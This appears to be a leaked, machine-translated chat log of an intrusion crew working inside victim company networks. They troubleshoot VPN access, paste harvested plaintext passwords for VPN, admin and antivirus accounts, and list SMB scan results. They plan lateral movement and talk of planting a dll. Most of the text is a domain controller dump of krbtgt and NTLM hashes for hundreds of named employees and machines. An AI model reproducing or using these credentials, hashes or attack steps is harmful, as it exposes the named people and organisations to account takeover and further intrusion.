and then start the VPN and then close the proxyfair close the ovpntac is holding the thread in the proxyfair process why it's still hanging restart the ovpn client stop I started without proxyfair just exactly disconnected the socket? yes[ ](https://mediaeveryone.com/group/telecomlabsinc-com?msg=NjCvbpwBwHnhtoGr8) ?sox_rukkotryaskanu here above whats the same error without proxy I ran it) with the same proxy and today I ran open a proxy in open aopn and forgot about it yesterday so I pointed proxy from cobalt in open aopn and threw the config from open aopn?
Wed Oct 21 20:50:52 2020 socks_handshake: TCP port read timeout expired
``Handsome guy, now there's a new problem with those craps.
  Target : autologon.microsoftazuread-sso.com
  UserName : richards@continuant.com
  Password : MyW0rdPassW0rd!
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 2/24/2020 11:30:58 AM
Now it just asks for Credits. It's ok, I thought I should change my -name to something of my own.
In cryptography, X.509 is a standard defining the format of public key certificates. X.509 certificates are used in many Internet protocols, including TLS/SSL, which is the basis for HTTPS, the secure protocol for browsing the web. They are also used in offline applications, like electronic signature
``What is verify-x509? Well, commas are used instead of slashes in config anyway.
I've edited my config.ovpn file. There is a line like the following

tls-remote "/C=Country/L=City/O=Company/CN=Name/emailAddress=email address"

 

You have to replace the line with the following line

verify-x509-name "C=Country, L=City, O=Company, CN=Name, emailAddress=email-address"
``try''
https://community.sophos.com/utm-firewall/f/network-protection-firewall-nat-qos-ips/93118/openvpn-tls-remote-deprecated-yet-used
``log:
```
Options error: Unrecognized option or missing or extra parameter(s) in lisa.ponsler@fife-utm.continuant.com.ovpn:6: tls-remote (2.4.7)
Use --help for more information.
``said that everything is fucked up, look at the logs, what is tls-remote to it[ ](https://mediaeveryone.com/group/telecomlabsinc-com?msg=4FB6bhSRASxsyA6au) which one? I've tried it with all the codes that I threw above - error on the screenshot
Attention pausestartt her creeds in the search string indicated mail ithelpdesk
```
tls-remote "C=us, L=Fife, O=Continuant, Inc, CN=FIFE-UTM.continuant.com, emailAddress=ithelpdesk@continuant.com"

``when deleting a string from the config asks for cresno with the existing configs it swears at the string is here open vpn through the eye of Sauron and hands search configs - empty while they do not see configs instead enikonnect - cisco ip communicator should be in the prog files x86 - cisco - enikonnect asks for cres when connecting? just tried domain without specifying the domain? there are sessions on 3 machines
richard
lisa
andrew
lisa is alive and it only has OpenVPN, it has configurations, but no cres
info on anyconnect should be at richard, still dead
andrew barely got to touch it yesterday and it died a cowardly deserter's death
SSL VPN
	IP address Https://207.225.113.146
	Username/password dadmin/w3r3g00d
```
```
SSL VPN (anyconnect)
IP address : http:\\66.236.103.194
VPN clinet IP Range : 192.168.1.230-39
VPN username : vpnuser
VPN user password : h4rdt0gu3ss
```
```
SSL VPN
Address Https://173.12.52.229
System administrator Usrname/password dadmin/w3r3g00d
SSl VPN user midawivpn/m1daw1vpn
``Yeah searched for rdp/vnc? no found vg logins? not saved probably not think```
--- FireFox Credential (User: administrator.MISSME) ---
Hostname: http://192.168.1.10
Username: admin
Password:
```
Is it possible that password is blank?
192.168.1.229:445 (platform: 500 version: 4.9 name: MFPB07F48 domain: WORKGROUP)
192.168.1.233:445 (platform: 500 version: 4.9 name: MFPAB870E domain: WORKGROUP)
192.168.1.237:445 (platform: 500 version: 4.9 name: MFPB37AD8 domain: WORKGROUP)
192.168.1.243:445 (platform: 500 version: 4.9 name: CANONC5035 domain: WORKGROUP)
192.168.1.247:445 (platform: 500 version: 4.9 name: SERVER-819751 domain: WORKGROUP)
192.168.1.252:445 (platform: 500 version: 4.9 name: MFPB43E92 domain: WORKGROUP)
192.168.1.253:445 (platform: 500 version: 4.9 name: MFPB316DC domain: WORKGROUP)
192.168.1.140:445 (platform: 500 version: 4.9 name: TIMEMACHINEBKUP domain: WORKGROUP)
192.168.1.155:445 (platform: 500 version: 4.9 name: MFP07330011 domain: WORKGROUP)
192.168.1.120:445 (platform: 500 version: 4.9 name: SERVER-T1 domain: WORKGROUP)
192.168.1.60:445 (platform: 500 version: 6.1 name: EMAILBACKUPS domain: WORKGROUP)
192.168.1.10:445 (platform: 500 version: 6.1 name: MM-VAULT-NEW domain: WORKGROUP)
192.168.1.222:445 (platform: 500 version: 6.1 name: MFPB4FDF5 domain: WORKGROUP)
``Poorly old (what I found) okay, it's a swamp poppy time will not be wasted
break what you can reach and fuck it usually on the AFP (can't do anything about it if the 445 is not available FShuevod, there's a lot of them, and also the admin computers on them ahono on the AFP can be without smb (this is appleplotaymashinah fuck```)
TIMEMACHINEBACKUP domain: WORKGROUP
EMAILBACKUPS domain: WORKGROUP
for example they are behind the domain, it's not clear how they go there also admins can go there through clients and not browsers if you looked at the hosts it's outside the domain remember how you defined it? but i'll check i don't think it's even here i found backups, but in the center no backups virtualization system priority anyway this shit isn't right

```
Serial Number: W8KMJ24BNHCR6CM


Website Link: https://home.mcafee.com/secure/protected/login.aspx?rfhs=1

Login: thomas@aktn.com
PW: $Mcafee1234#
``You can get ready, I'm going to find the password for the ABDA, I threw it so I wouldn't lose it, I'm going to shut it down, what do we have here? Ask a colleague how to do it, ask a colleague how to do it, I'll give you a dll, pick a quieter and more remote server, thanks, you're welcome.``
[DC] 'MissMe.local' will be the domain
[DC] 'MM-DC3.MissMe.local' will be the DC server
[DC] Exporting domain 'MissMe.local'
502 krbtgt e7a33c4e6c4edc222481d99080ec3c08 514
4146 ELO-AE962551BC7$ 81639909f862f53089210fd95b8632eb 4096
2735 THOMAS-THINK$ 75b626032ebcada49315e028045d5879 4096
4135 ROYKOWN-THINK$ c7d508cda2e5903a4a6d5eca1102c500 4096
4152 IBM4-THINK$ 590ef9ae405c55f6590c56b962b5f439 4096
3716 ELD$ a290db25d845ecc3843ab2cc9c82f16e 4096
4145 THOMAS-HP-WORK$ 62d192174bd613b81f92b49d5e8235be 4096
2305 LASW01$ c23d996b31e6afd862214c7f54cf70 4096
1554 MISSME-F7082DDB$ 3b42fe51b694f829f865bbd7114fc143 4096
3638 HP20181167898$ d69f6b7c436ee14007b6fb5454f84cec 4096
4161 ROYKWON-HP$ 88f0acaf77f17e498dbb0076f7b664c5 4096
3690 AIMS-SVR$ 370a577c38663b023d5947e8018fc930 4096
4178 TM06_YORANDAGOM$ 54a09a85d93611b9b4eb2db588957584 4096
4182 STELLA-HOME$ 8c44fd32a091a5cd0e204bf1feeb5f4d 4096
4185 MEK-ACCT1VM$ 0b9fd6996556cc1f1ee2be2658b0c4bf 4096
4192 MEK-ACCT2VM$ 0897b83a3b3b31ba2f1fe2a869bce569 4096
4141 LASHOWROOM05$ 85a3d5a3eeacc605489ab043dfd8ae49 4096
2645 HQTMP08$ 4f093e3548a0b26ad70cf2affb99839a 4096
1610 MOD2User 2271cf353a840dfe25bb8fd2fe773cad 512
2730 HQTMP12$ ea8680c0181c316b270336b10a2103e2 4096
2642 HQTMP07$ 2296e463b7a2175bd36d573d12db7731 4096
2110 NYPC05$ b7c6bfa69a521a05ef19f985e14e8de8 4096
4227 HP196$ 6e5819beb5b7344cbdbb4d64789ab496 4096
2107 NYPC02$ 81f2b35b4335b519a50f9460a2648829 4096
2106 NYPC01$ cb2cfd14a2e22c6e28e98565c18d451e 4096
1138 JasonTak 20efb41d34a235754a4c9bb1bb15e7fe 66048
2043 SVAULT-SVR$ 648c9dae88921ee8ea18261daa0eb1d7 69632
5617 itmac$ c413964d5509a1457207eede89cf98b7 4096
4226 MMNY002$ 30969d0e639fe3cd4dd9bec921bcc5a6 4096
2626 HQTMP06$ 2e9cb30e176a3e638134bcda39f7dd59 4096
5624 hqmac015$ bf11ebbb7eee4c2f4fb71a6f9132c189 4096
3822 LASHOW03$ 3649c1d621939577c103c348fd7848b1 4096
3792 HQTMP04$ d9135a22a01082800e6c653c775a65b0 4096
4165 THOMAS-WORK-HP$ 0a571eeefc5f0e911477bd21ced146c3 4096
3814 TrentMaclean 32a861404177c2292b02d41a1ffd05fd 66050
5675 MEKMAIL-HP$ 57836ec1d7e243b5eaaf5c73b7338d6a 4096
5660 hqmac025$ b437f7f303714c9a910edfdbc7090f7c 4096
2702 HQTMP10$ 0fe96168d14f72e1aef67d86b0f31c3f 4096
4225 MMNY001$ 2843485c3817c7487534860c7bed0a2e 4096
3890 MMNY003$ cf7695d32c74c69772f09c825a07daea 4096
6119 joekim$ 865101b12e6702e23eb310255a1c7240 4096
4248 hqmac006$ ce9c7374d99168b69b71662f14f70bca 4096
5622 hqmac003$ 5654afcf073f3a72dda061fa70b49f8c 4096
6124 mek-mac01s-imac$ 97bf33692fb6720ce963b6462b55b24b 4096
5625 osxserver$ 3a2b06b5e4ed40693850b92f5b893452 4096
3924 hqmac016$ e1a7503caa1f6336aea07013bb0e2eeb 4096
6138 hqmac029s-mac$ 68bbda7d561942775d518d3cd9e5bf05 4096
3931 hqmac021$ 75b474ac45326761661ddefd88e2ca11 4096
6145 hqmac037$ 10659f2bece677b186aab29cc2814cba 4096
3802 LASHOW05$ 0f5a535d5c1603c022a2bb2804f2324f 4096
6140 hqmac030$ 8a7eb7d5e9a8337f389480061387f5a6 4096
3919 hqmac004$ 440de876a486b74a77f1891826c38b23 4096
6153 hqmac038$ d0941c78d5780d989b682a7efea6ab62 4096
4256 hqmac019$ 4851ea5d113e4eb17e79aac3c4330661 4096
3821 LASHOW02$ d199c6c8033e050d7aefd62b0d857552 4096
2736 LASHOW01$ f8f60bafc0496f5e30e5650adec96f12 4096
4224 LASHOW06$ 60e7daef67d101d5d38324d0b947c809 4096
3823 LASHOW04$ 97f8d9f46fc5a59f0ef703d8b1510e8b 4096
5723 SURFACERENTAL01$ b297cf14bdc1617d7993cc3003c7d9ca 4096
6128 HQT006$ 232ed08a47070f7ba9a38a5dc809b55a 4096
6117 hqmac027$ 85d54781b00a8f818b743e3ab932f660 4096
5676 THOMAS-HP$ c1fab19aac8fcf33d0f152f3b4551371 4096
1155 RoyKwon edde0a2302794d0af770ed7d15081005 66050
1176 SteveKim b841b54f0c6238dd30cd66fa2c1eee0f 66050
3628 NatalieN f2b77c7548eea308677a1357baa052bd 66050
6125 HQT003$ 9fde2eeb2c90a687c7ff2062ac68078c 4096
6113 it-macs-imac$ 5bf5f78f0da435f2d59be213633109c6 4096
6160 hqmac041$ d71ad5ab65c7b34c77f226e0cf0d4457 4096
4170 HQ121$ dea99309f148e950bd15700fb4f63354 4096
1397 YoungCho 2a811a6e4b55f7c19d146b73fd1dfe60 66048
4252 hqmac008$ a2cfb8f09cdb0f8c677236b823e163ec 4096
1145 EricChoi d1eec596185e0f634bab3761f5a86da8 66048
1162 MayHan 8f18cabbe2b0f33343ad4f35bb25f0a7 66050
3840 SunHeeLeem 53497e9ecf73893ab53e27ba682b20a5 66050
5639 Julikyun 84079b3db4b1e965a05f8aa7e1a90747 66050
3658 DaniWhang 06adc46626eb166163cd0f9c261bdcd8 66050
3665 DooyoungKim 4c1a588d4c19b174e32ae5e9c4d40577 66050
5629 CarolineLee e429408c826ffbeb486c4f66341438a6 66050
5771 MM-BOOK-17$ 34874ee6462fcea732311d3b371c54674 4096
3921 hqmac010$ 4473f0748637f3472e51d264becf27fa 4096
5644 hqmac022$ a945b5645541f6c15a03c19d9b26e3d0 4096
6187 KPNWH009$ b91cc44029ab92916ea5b2be1f03ae0e 4096
6188 KPNWH010$ 4f636d219b77e3ce032f917cc3f6927c 4096
2732 HQ054$ 3aafc4fc1c5896b69b49a0affe9e0efd 4096
4202 HQ163$ 0de0b6eac037cd47da8e40b192d3b346 4096
3855 HQ167$ d3dabad07fd4fc143eda83af97ce21fd 4096
4206 HQ170$ 493a52694f33d857d444662468750094 4096
4207 HQ171$ 6abcceddf37897ee28505913460206ca 4096
4209 HQ173$ a530d47426ce2d28f50880533921a8e0 4096
3863 HQ175$ cc32bb327c31d38e4690863bcf72ec36 4096
4217 HQ185$ f1fc9879ee531e25f813e63ba3385575 4096
4258 HQ224$ 0f29fc0252f5f99c40eec50712a2e2eb 4096
5613 HQ213$ 03462bba4de1e66757656fc33ed62424 4096
4233 HQ204$ ec89df2639eda50ff9f7027b0595d865 4096
4230 HQ199$ 0836a33445851bcdc0378505403f72fc 4096
5681 HQ239$ 86a324202574d4d1d52088e317081271 4096
4223 HQ193$ e844c8b07b6bb2b66dbdce4792990825 4096
6146 HQ267$ b7521c6f10d9140011662761cfbfaa92 4098
5721 HQ263$ e1736bc430290de94c38d62322dc3731 4098
4253 HQ218$ ba1b9aad47589af0bed56e4c42ecec00 4098
3930 HQ225$ 1e8bfef00b16c4eb18337dfc1ffd4691 4098
5670 HQ234$ be438598d72404076e05b3154d75f814f4 4098
3925 HQ219$ f37b649994994912fde728f9bb33b195a19 4098
6126 HQ243$ ad3d9d8d0e33652f8f8a7a49a4946a22 4098
6152 HQ271$ b2572bbcb601aad27763ad53755b4c7c 4098
6163 HQ281$ 502249f258905f755079a6e954c6beb9 4098
6166 HQ285$ 69121ca579a75b76238ab16b9b6d5a8f 4098
6168 HQ291$ 59963e0afd783fafdf7228c94beda85b 4098
4159 HQ107WORK$ f7501144a4eb8cb65d647161c2786d90 4096
5798 MCTEST b58b38a0038bfa92d22a5d8d06c51f45 66048
5673 HQ238$ 3e74a9ce0dc572a227c3eff34a093a21 4096
5728 HQT009$ 454dfbce440c92e162c9b49df65a0fed 4096
4197 HQ156$ f3b66b6a7729b159e99632095652ae8a 4096
5722 HQT008$ d345fb1b81290ab918df4f48753cba9f 4096
1974 DemoUser 95197f192c3878bd20d92d19a1e06d14 66050
5754 HQ286$ 4d72e65e9a02a9932a3ec49c5da21e59 4096
6189 KPNWH011$ 0fb8b8c233f5638348d590da0240748c 4096
5807 YolandaGomez 09b24c3afe78be3d47d2a44953d3ca20 66050
5802 SoniaChen b78b06f140877bd735115e18eda0c522 66050
5804 JamesYoo 6531d27c4430bd65fe56640647ff41f6 66050
5803 KayleeSeong 515dcbd556ef06fc3d75ac2c49af394e 66050
5806 KennethKim 788d511092eab1b20b5d3e492267cd33 66050
5738 HQ277$ 8b249236f26194c46fe218b9b1603615 4096
5878 hqmac057$ b6918631d07ab98a8dcccb263747933c 4096
4168 HQ119$ 77ee5d2a712e4c88122eead4538fe976 4096
4181 HQ137$ e2330552c16213b62717e4f679535cce 4096
6182 hqmac001$ 4f967b21fd2348237a5e89db0ffb9dd4 4096
6149 BARTENDER1$ b3c5ed5fb9f2c9b1dafdf4b3d9f601f5 4096
5849 HQ309$ 66fbbf666b0fa452e77e89efa038b0d4 4096
6191 hqmac047$ 0d94f798c257a5f957c6c850dfe9f4ca 4096
5717 HQ260$ d00a4dfb9f0051471eddb07a04f79419 4096
3891 HQ194$ 9326303b9291d7185e50ac32e94f0b8b 4096
6115 hqmac026$ 6fb614c51682ccaff204f71e6b8ba61f 4096
3920 hqmac012$ 9c440385810cc3f1405a50455d2c9ed4 4096
4200 HQ161$ d5e51307755a499a223bec575648b966 4096
5833 KPNWH002$ dbd21897d282b5be82892c4233554937 4096
4218 HQ186$ 04708bbc4fad81334587636b7732bc47 4096
5881 KPNWH005$ ad368370e8d93c7b8352c511ffd5cd4f 4096
5749 HQ283$ bb8fae1c35517e61bfe7794c3a24c94f 4096
6193 hqmac051$ 69fc114100945750b5a4b2255e7d1f08 4096
6172 HQ295$ 58e8b9be412b4edd547bc1e81bc43930 4096
5900 JennyKim bacf032fa0507f214011a998419c8a24 66050
4157 HQ103$ fd83429a7e16b9e00c881c47a57e0570 4096
5732 RubenAjanel 4b60ff7da6911175b03d52ebbad61ea1 66048
3798 Aditiya ff2206f7cce075f4b94c240f84fa87b5 66050
5700 AllisonHatley 28e329b7b2e6440e0442d30018887ec1 66050
5780 AndymKim 8af86b862e4b3e5b282cd728eca955e9 66050
3770 BenjaminYoo c87f1395d52d498509ad9a81cbeb66c9 66050
1194 CarmenBautista 20f823a52f52886c24ff17ec24863c70 66050
3738 CaseyYoon a2743599d8de5c04ae19c8d5b06e00d4 66050
5887 CrystalHa 4e30d11b09201b1d2a4e3ffec8ec1356 66050
5779 DarenaYee 15d6b89b012240193b0f864bfd557dc6 66050
5626 DarinUnke d6d82f080ad59b30184f48b7319e9c7c 66050
3752 DianeLee 8524f0ddda8ad90716cbec4a43eabfa5 66050
5861 edwardvillaflor 6991452b1e1109cec321597551c5aa46 66050
1469 HannahLee 5fe5b315023fc58559ced8c62193d721 66050
5891 HannaRoe 109026de4d387bab6788f1e3fa947329 66050
3722 IvanFranco 0644b58b4e4cebb1eb7948640188386b 66050
3903 JamieChu 10f2774f0fee32179fb5c72d18d90f27 66050
1182 JasonYi cc6e7ed41bee7252216c5e00177c6dce 66050
3796 JenniferKo cf82c20d8b916740536f231bf89176e4 66050
5862 JenniferLu 055b2f2830ac22e3adbdd0aba8032a6a 66050
5845 JoyJo 8a386750cb7f79b293e74c7dcbb985f0 66050
2051 KirstenLee 2ca7f19c77b6dba33d03c9ea83ce77ee 66050
5813 KPNWH f2881c89b8d79e078cc6fe323cd1f5c6 66050
3851 KyeongKim 6b1d99b1a8f8787495034147364ad8af 66050
5882 MarianaFe 97746f1f22b7626f4b39a150f1237cd7 66050
5825 MollyPoer 10a62127dbbf80ecca2bbd326c7afd4d 66050
5814 PriscillaW 53bf2d1072aeabe7bacd02f5dbf0242b 66050
5884 RachelleRoh a9c592e5bfed559620db2747fe12e0df 66050
3804 SarahBrown dadc931ee4418fe09290f5fcfa7a31e6 66050
2274 SherryRobinson 2504f4ed1bef329ad1a82be522ef9d8b 66050
5778 TammyLee 2579ab1f944482c42e3bfa86025b3781 66050
5810 TerryJung 3893cfeb41316e3236fc24e6b19a7b88 66050
3893 TysonRoberts 5c85c652cbe3a5d07e5cceee06ff648f 66048
5704 hqmac029s-mac-p$ cb9c71b8a8ca5dadc08a67bd48a44ddb 4096
5839 CaseyKim c86a193b217c2bb3e2a709cd3eed8bef 66048
6214 hqmac055$ 14d988005fffc670ecaa4bc2155a7819 4096
5916 EileenAhn 4fdc363f603e2da46f2dac25e0452dfb 66048
6144 hqmac036$ aba4d8780a601a8d96018bd83bfbc3 4096
5724 AnaLerner fd74c2d41744ec69627ccda78c24045d 66048
5906 LaurenYi e302fcdf9cfa1aa396911b17af72b7c5 66048
1170 HyeRChung 26f9e6b2b0a2f3cdd26c6c82f3576b1f 66048
5706 HQ252$ cebe173dab5366f8f5e5e7734c6a2485 4096
5645 hqmac023$ 92885ccdc650bfe1a1c8cf8be3688553 4096
5838 hqmaq049$ 2b2e8eb7de8c32f5cedd5ce611ef64 4096
5856 SoohyeonJu 87147bb3f58ac1f730a82e1e80704202 66048
5855 KristineLee 5769997bc24d4d0b6c3f3d2a24ed99ed 66050
3869 AimielCruz bc1d46b20def74cd03e9fc377c23860c 66050
5705 GigiMo bf7b867d02f4643d4de0fa236e2b5aba 66050
3831 EricYoo 092ab18778a5b24107764b2935fb84f1 66050
5877 AmyChrest 13d7af5dadffbf56b1ba688e9ade9c6fd 66050
3843 SherryKim 206f576f7f34d314c59c3c79c880098a 66050
3850 RobynEden fe3e34132f1820532c8454a114d3c237 66050
5876 BrisaFrench 02a756cbbc986e925720f5f0abfc49ac 66050
5746 AyumiS 5f693a08dcaabaacab2a9941178edc8c 66050
5846 BerryRoe f4c7746bcf5217b446b4b24cbc7cb9f8 66048
5708 RochelleC a4f4550e65082f42dc43557b05fef714 66048
5685 KatrinaLam 6ebb1ee9dfcf841c74f08efb91288a44 66050
5867 MaySeo 3c1fb10039c8249583ee285277ea7149 66048
5761 SaraLin b202b49eeb32b6d32a70c9d404c07758 66050
5646 IanWilliams 51b684079799f9b9cf97ec0628a129ab 66050
5621 MKIM cc58f2d3ab17b7510bc2c69738be2a62 66050
5653 ChristineWang 7de678c6e3d53bb203b3f616d4ac3469 66050
3880 DannyKim c45e98e65a5308ad802d17b47b21b5b4 66050
3884 ArmidaTenorio 6abd12f3155f8c8dc88e7952f4bdf767 66050
5707 CynthiaCeballos 84ea8f5bfdbb81e08ac23a4c090e399d 66048
5631 BrookeLamb ea8ed05bba630cb348831db253c9f533 66050
5618 DianeJoo 107831efd32c15e9055a67328be8178 66050
5823 JulietKim 899c8f6cc0acd27da61e1de00a572d06 66050
5691 ColbyCochran 752b0dd44fc8ad88f029ee634b22ec11 66050
5851 JulieAhn 0c35bd92e8e949d72b87dfdbf7b91f34 66050
5665 CynthiaLe bd4e7e36fee6058d3da5dc94e726d354 66050
5847 JiJiPark 4c8e2ef2ec82cdd48c87ea7c9dba6578c 66050
4243 MichelleKim dd42d76c4f23ce1568269e50ef19f99c 66050
5769 CandiMendoza f3eb87ad697f1255ac8f8828cf32010b 66050
3894 EstherYang 0cc102edc0751a912c7357fea84b723f 66050
5864 RianneLee 4a2e10be4cfe8b16ee4f1203a9fd50b0 66050
5619 DonabelDacumos eebad80e60bdf026b3e22825f75ffad1 66050
5873 MoisesRivera ba498a5d108d652a0b28ccbd8fa433ac 66048
5763 AdrianaNajera 64adf3f2840e0e97c24052fa3fd69b54 66048
5692 PabloJuan 476ef9d2552e0b988193c7606dbf3321 66050
5874 SoniaAlcantar 159387d789654c9d86afbe5534a9b8d6 66050
5840 AsukaInoshita b33874cc598428c5355de75899330406 66050
5777 AmberTrillo a55b47cf346cb8180c94beb022768970 66050
5666 LauraChun 84e26f7fefcf961d06ded608d2d0cdde 66050
5901 HannaKim c8b8252b646fd217fec981b459c8d1fd 66048
3867 StacyChong 2af8c710f387152783e3dddbcd9919f8 66050
5826 CorinaLopez cdd757a09c8a94c9e9afc4a4d0d8f86a 66050
5879 OliviaSon 7b399e87e116d447a0474e6b8e3f90b2 66050
5772 MarimoNakamura aa564997d2ec6a562f43d23d61da8f72 66050
5737 KellyKrapf d6084685870c70d38bcc7cb808c5eb55 66050
5765 LisaCano 343e018ee7d036929deecd17e6eb9201 66050
3861 KathyBuri c3aab25918933f4c31588482ca1ce8da8 66050
5751 TeddyLee 8b5ef5b285944b140367c759a70b12b5 66050
3833 JPAntonio 3eda63fd4bf28ba37b061fff4f3ea25b 66050
5768 MichelleHughes 7a353222568c31750ddf263dcb60717f 66050
5801 EuniceSung 0771d3292bdb8226956709118b758f2e 66048
5844 BrittanyLee 0ebffbba2bfe6fc460bf1cd574a4f44f 66048
5635 hqmac020$ 2c62f2e09f34d1c08952df71c50ae552 4096
5693 hqmac024$ 3a6e6e39d531690a3f119c75c552968a 4096
5917 HyeMinLee 7b6fe95a8f84ed4cf4d32ad70fbb4587 66048
5854 HollyHong c61d6b3f77c2b4855812fcd8630ef5fd 66048
3653 YoungPark 6e0e7aa9c00527b0fa1bbd6d0cd98fd0 66048
6194 HQ310$ a71e5bdfaf4a80d93bdd3386a022de3e 4096
5834 KPNWH008$ a5d299ff2966dc2d5a0d56a0bb2c383d 4096
5726 HQ264$ 9d7dd5edd4a8efeb03c2e23aad43b63a 4096
6150 HQ269$ 656216e0054218e902a474bd7155e285 4096
4174 HQ127$ 03a49b6dccbc1dd7ebbc700839c99e9eb 4096
5905 KaylaShin 4ded1802b3eb1aa7a4b9a6377fc321b5 66048
3763 EstherPark 4e007b54f6c36065e3201ecbe986209e 66050
5836 KPNWH022$ 050351e2cb1c757ee2656de8a9429628 4096
3740 YahneseGriffin ec3f0f20a6578b3baeffac643e00887d 66048
5902 BrittanyB fcbced07ee40a75906c5094bbd415df3 66048
5770 StephanieRamos c48ae90c892a82790b9ba984cfc9f42cb 66048
5843 hqmac052$ 597409290b7cdf031a0959eb6c7047b5 4096
5835 KPNWH016$ 99bcedb53bba0948956aa3c15fbf5854 4096
6192 kpnmac011$ e9aee4bd19cac93d723d107c2491c1c8 4096
5890 GanieHwang 90d282fdbd1ffb7c7ba07e48a967cee4 66048
5668 BrayanSerafin 49ebbb91c81babc7089316a0bfd81133 66048
4228 HQ196$ 3b0acb49688c0d4c19b9e55a1328534c 4096
5775 HQ304$ 132f8612e7c095e040596956e01e4855 4096
6178 HQT012$ 084dfdfc51e8403d969b68ab2972b983 4096
5829 KPNSR002$ ca8cbe530b218315e155ff8e76d4c6f3 4096
3904 HQ203$ 7a88c957bc45cbccfb354bcdd1450aae 4096
3655 LillyKim 423b5d1ef30cd08e4ba545c79adc9323 66048
3927 hqmac014$ e1a5e73161369fec7e5e1408bf295803 4096
5869 ChloeLee 8637cea980695ea8d5c8ac3f5e1da29d 66048
6127 HQT005$ 58a459f3f55527d0532245998d1a9652 4096
3764 JanetteFlores 1af2e1956d0c6405d27912e7d8def701 66048
5907 JinYoungKim ba3dfb7e94110778ee0dccc2546423af 66048
5875 AliciaHwang 48bb75a2109064b5f558eedbef042f1a 66048
6171 HQ294$ f1318b15a580a08df95b7bb4fde038c3 4096
3832 HQ158$ 5967271268cbedf66eb4cacf7ed527f9 4096
5742 MarbelSerafin ab12067db2517fb01b3c9fbe1421b6b7 66048
3801 JillianHong 02f266f0a3a3d362391a4c441e129b89 66048
3824 HQ151$ 64d5675d0c401c336cc013ecf13c8551 4096
1778 wh 82ea11ee5c73ebdc9bb4fde2b12df244 66048
6205 HQ315$ 3254d8470d844fa5eec4aedce35d4623 4096
5926 BrittanyLovell 6e30ee1c49ceb27edcf853499f50b25e 66048
5947 LeslyPlancarte 35332e7fb780cf30fbfc29cba93d7bf2 66048
4160 HQ109$ fdb7ca77f3106f6fdb55b4abcb47ea39 4096
4204 HQ164$ 61dffd7bef7d4844eefc6725dff50e40 4096
4176 HQ133$ 61b501c8e80442e73ff80b99721a0e58 4096
1178 TonyPak 1c3241f96515b83f74e7a277ea956532 66048
5915 JenniferChoi 68fee161b32334b8c4d69501cf8a5414 66048
5920 AhramRyu 490cf9ded21774c424116348f2215916 66048
1258 PaulOh 788b3648d74e26a7d0957ab9090f6f9a 66048
5739 GloriaHernandez ad6519dd6264b8cd233b9170956bde84 66048
5696 HQ245$ ae21c627f742c13bf010646370741592 4096
6223 hqmac066$ 3d7da7ac657a23f41d99624738978568 4096
5925 HyePark 7581ef7f434a6e75db6c7d5ec13b240c 66048
5934 AshleyChoi 678756df085a482b6dc37d3d1716cc6e 66048
1220 TimKim e0583b06baa1f40f58b6cd0c858b304b 66048
5725 SofiaSuk 8095fdaff069e7529f5d151a3304feaa 66048
5893 JulyPark 732318e15172095f7ff6fd71e2b42465 66048
5910 AriaChoe 28d670b0d2f5778c72056689f0722396 66048
5945 hqmac064$ a25e890b4d676a2631de0966235656dd 4096
5924 YoungSeo 7211ae4e73a2ebadb6abf53342cc5d10 66048
6176 HQ301$ 9acda185c7366c9f778d3be298ea601f 4096
5719 HQ261$ 98fccfa82c308baeddee8ab56c5c6b3b 4096
6199 HQ314$ 232218af45baec7a05f04c7013dbe02b 4096
5718 DarleneYoung 90ef8ad2330b735b0ee2d679fd409fc9 66048
5918 RosePark 54ceac79513faf8b8c49c255eebfca2e 66048
5747 hqmac042$ fa801a973cd68e1465340e35d1183d18 4096
5860 HanLee 6787dc7c99c6ff77e17a29e1ae5df15b 66048
6156 hqmac040$ e8e76e4080c49b5be3284377ceb0f776 4096
5964 HannahChoi 1df148b29b41024c47fe7a579eba36eb 66048
6196 hqmac054$ 8e78768d957fd8332ba37dafc4a028b9 4096
6157 HQ274$ a194161c5d36454ae0c65d44ba450ed9 4096
5632 hqmac013$ 8871078b7ad26ab2687db783e45ad7a1 4096
5620 hqmac007$ 36e96c68976f9fe8f0f5400f7d4153fd 4096
5931 ChloeSLee 45735e1130c3ffbb7a93eb4bfa9da31c 66048
3881 LoisLee eecd7b8fcc873bcaab511637c6744ac5 66048
3922 hqmac009$ 5a635d3a51aa761dca80f74be571e637 4096
3879 SaralynLoeur 35534e1a493d11d2f0cfc96bd4fb2e6d 66048
5745 HQ278$ abd7bfd0e512f1ff76eeda3af0c06920 4096
5944 RobinBae 4691a2c87c12edcd0d1bbf90964c8e66 66048
5858 HQ324$ 61cf9d70faeb9653ebaffecfc5277f04 4096
3686 AndyCha 115f4ef32315d242abe6351fff681ec8 66048
1226 TomJeon e4aded47f1af2a92a3807e7bf70dcf74 66048
3749 HQ033$ 81701208a469a697c90810f8cb9e2c90 4096
5762 AmandaSun cba0e67baeba56702b742b82d358c9d1 66048
6143 hqmac035$ 04a761dbb7e893fd334a5e9f651681a0 4096
5865 YadiraEspinosa f537f1445562dd8587d1c8b69409871c 66048
5974 HildaMorales 468138ec7d092db58d3a8529ee9f2d4b 66050
5921 IrenePark 3cf52cdea9a036efa0b642da4c19c950 66048
3615 MEGACOM a103a33e9e358a8e5eddc67a7c00e31e 66048
6165 HQ284$ ef69274644c4fde88694bc5e5b279696 4096
7110 HQ323$ 16f8e1f6d49c463e5e2e4ee1e35d2505 4096
6180 hqmac044$ 6bfb6396b0b845c6efa24f29e1f2ec21 4096
1153 EuniceLee 09126272831b72ba18d67f00b033a090 66048
5690 HQ242$ d4a2a3892784c304582d3bba4b199de6 4096
3928 hqmac017$ dc537791ddc56ad815cfba5b0b2baedb 4096
7111 HQ321$ ba72ab25f2f40496792a204e09de8da8 4096
5853 hqmac053$ e5f5111ff177574f743a5de6960bbea1 4096
6204 HQBARTENDER$ e048208bd591b3dc6816fed497e9ba64 4096
4195 HQ153$ c16c76a28fa0e484ba164a2cb85780e7 4096
4255 hqmac018$ 78c159e8016cb592a18e4b0c4f176b61 4096
5657 BrendaPerez dc769f15e6c1c5cdb3974278d29a6d6b 66048
5966 JaniceAhn e8003cea07e597b8f3f125fa1b41ef78 66048
5980 ChristinaPaik aa5d8328edf37916fba36fdce62fe2b5 66048
5936 KPNWH019-THO$ 7c56d2e9353d443d56afb459eca32cf4 4096
3646 ThomasChang f5fecc2c183cea4c2a6537af2b3dd5c6 66048
5975 XiomaraMartinez 4ead53958976d4983b676f4fb4386286 66048
4179 HQ136$ f0d00d4b3e67139441acdf98b4ac2348 4096
5968 TiffanyChoi f702fc7ed5dc3318366c3ff250efc797 66048
5837 kpnmac015$ 06e2815239f004ffa6c0c36736469de2 4096
6158 hqmac039$ 9618175177e6e6c08b03cd001521fd26 4096
